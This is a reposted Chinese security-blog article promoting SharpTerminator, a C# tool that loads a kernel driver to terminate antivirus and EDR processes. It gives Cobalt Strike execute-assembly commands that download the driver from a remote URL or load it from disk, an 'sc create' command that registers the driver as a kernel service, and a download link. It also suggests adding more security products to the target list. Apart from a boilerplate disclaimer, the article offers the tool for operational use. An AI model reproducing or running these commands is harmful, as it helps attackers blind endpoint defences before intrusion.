Csharp加载驱动干掉杀软进程

admin
admin
admin
140350
文章
117
评论
2023年6月24日02:54:36评论76 views字数 537阅读1分47秒阅读模式

工具介绍

基于@ZeroMemoryEx的Terminator项目写的一个C#版,可通过URL远程或本地加载方式干掉杀软。

我们可以在源代码自己添加一些其他AV/EDR进程再重新编译,还可以集成到CobaltStrike插件中使用。

使用方法

远程URL时驱动程序会下载到 C:WindowsTemp ,然后从那里加载。

从远程URL下载驱动程序并终止AV/EDR:

execute-assembly SharpTerminator.exe --url "http://remoteurl.com:80/Terminator.sys"

太狠!Csharp加载驱动干掉杀软进程

从磁盘加载驱动程序并终止AV/EDR:

execute-assembly SharpTerminator.exe --disk "C:pathtodriverTerminator.sys"

太狠!Csharp加载驱动干掉杀软进程

已知问题

果您收到“无法在受信任列表中注册进程!” 错误你应该手动添加服务:
sc create Terminator binPath= "C:pathtodriver.sys" type= kernel start= demand

下载地址

https://github.com/mertdas/SharpTerminator

原文始发于微信公众号(Hack分享吧):太狠!Csharp加载驱动干掉杀软进程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月24日02:54:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Csharp加载驱动干掉杀软进程https://cn-sec.com/archives/1826911.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息